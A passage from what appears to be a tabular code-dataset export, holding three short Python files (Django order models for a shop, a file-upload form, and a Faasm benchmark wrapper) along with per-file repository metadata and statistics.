| 21.272727 | 71 | 0.634615 | 160 | 936 | 3.6125 | 0.25 | 0.221453 | 0.207612 | 0.16609 | 0.307958 | 0.307958 | 0.195502 | 0.179931 | 0.153979 | 0.153979 | 0 | 0.040334 | 0.231838 | 936 | 43 | 72 | 21.767442 | 0.763561 | 0.064103 | 0 | 0 | 0 | 0 | 0.050401 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0 | 0 | 0.214286 | 0.035714 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
813df2208329c1eed93b0b636e383fdd4e7a6884 | 2,077 | py | Python | orders/models.py | falconsoft3d/clientportal_shop | bc09eda46cb42bbc490dfc6d958250ec000073b5 | [
"MIT"
] | 5 | 2022-03-14T21:15:20.000Z | 2022-03-22T10:11:58.000Z | orders/models.py | falconsoft3d/clientportal_shop | bc09eda46cb42bbc490dfc6d958250ec000073b5 | [
"MIT"
] | null | null | null | orders/models.py | falconsoft3d/clientportal_shop | bc09eda46cb42bbc490dfc6d958250ec000073b5 | [
"MIT"
] | null | null | null | from django.db import models
from accounts.models import Account
from store.models import Product
class Order(models.Model):
STATUS = (
('New', 'Nuevo'),
('Accepted', 'Aceptado'),
('Completed', 'Completado'),
('Cancel', 'Cancelado'),
)
user = models.ForeignKey(Account, on_delete=models.CASCADE, null=True)
order_number = models.CharField(max_length=20)
first_name = models.CharField(max_length=50)
last_name = models.CharField(max_length=50)
phone = models.CharField(max_length=50)
email = models.CharField(max_length=50)
addres_line_1 = models.CharField(max_length=100)
addres_line_2 = models.CharField(max_length=100)
state = models.CharField(max_length=50)
city = models.CharField(max_length=50)
country = models.CharField(max_length=50)
order_note = models.CharField(max_length=100, blank=True)
order_total = models.FloatField()
tax = models.FloatField()
status = models.CharField(max_length=50, choices=STATUS, default='New')
ip = models.CharField(blank=True, max_length=20)
is_ordered = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
update_at = models.DateTimeField(auto_now=True)
def full_name(self):
return f'{self.first_name} {self.last_name}'
def full_address(self):
return f'{self.addres_line_1} {self.addres_line_2}'
def __str__(self):
return self.first_name
class OrderProduct(models.Model):
order = models.ForeignKey(Order, on_delete=models.CASCADE)
user = models.ForeignKey(Account, on_delete=models.CASCADE)
product = models.ForeignKey(Product, on_delete=models.CASCADE)
quantity = models.IntegerField()
product_price = models.FloatField()
ordered = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
update_at = models.DateTimeField(auto_now=True)
def subtotal(self):
return self.product_price * self.quantity
def __str__(self):
return self.product.product_name
| 35.20339 | 75 | 0.714011 | 265 | 2,077 | 5.381132 | 0.29434 | 0.136746 | 0.151473 | 0.201964 | 0.47195 | 0.2777 | 0.235624 | 0.235624 | 0.168303 | 0.168303 | 0 | 0.01922 | 0.173327 | 2,077 | 58 | 76 | 35.810345 | 0.811299 | 0 | 0 | 0.125 | 0 | 0 | 0.065479 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.104167 | false | 0 | 0.0625 | 0.104167 | 0.895833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
d49cd26aa57849731f642d65c31a4c763b7dff77 | 87 | py | Python | rusel/base/dir_forms.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | rusel/base/dir_forms.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | rusel/base/dir_forms.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | from django import forms
class UploadForm(forms.Form):
upload = forms.FileField()
| 17.4 | 30 | 0.747126 | 11 | 87 | 5.909091 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16092 | 87 | 4 | 31 | 21.75 | 0.890411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
d4a4d2f9c7dcf14b818e14bd146d3520a0c0d7ee | 137 | py | Python | func/python/bench_mdp.py | J-Heinemann/faasm | 6a7472d73ef7cc18e63617c72715c8775afd11a9 | [
"Apache-2.0"
] | 1 | 2020-04-21T07:33:42.000Z | 2020-04-21T07:33:42.000Z | func/python/bench_mdp.py | J-Heinemann/faasm | 6a7472d73ef7cc18e63617c72715c8775afd11a9 | [
"Apache-2.0"
] | 4 | 2020-02-03T18:54:32.000Z | 2020-05-13T18:28:28.000Z | func/python/bench_mdp.py | J-Heinemann/faasm | 6a7472d73ef7cc18e63617c72715c8775afd11a9 | [
"Apache-2.0"
] | null | null | null | from pyperformance.benchmarks.bm_mdp import bench_mdp
def faasm_main():
bench_mdp(1)
if __name__ == "__main__":
faasm_main()
| 13.7 | 53 | 0.722628 | 19 | 137 | 4.526316 | 0.684211 | 0.186047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00885 | 0.175182 | 137 | 9 | 54 | 15.222222 | 0.752212 | 0 | 0 | 0 | 0 | 0 | 0.058394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.2 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.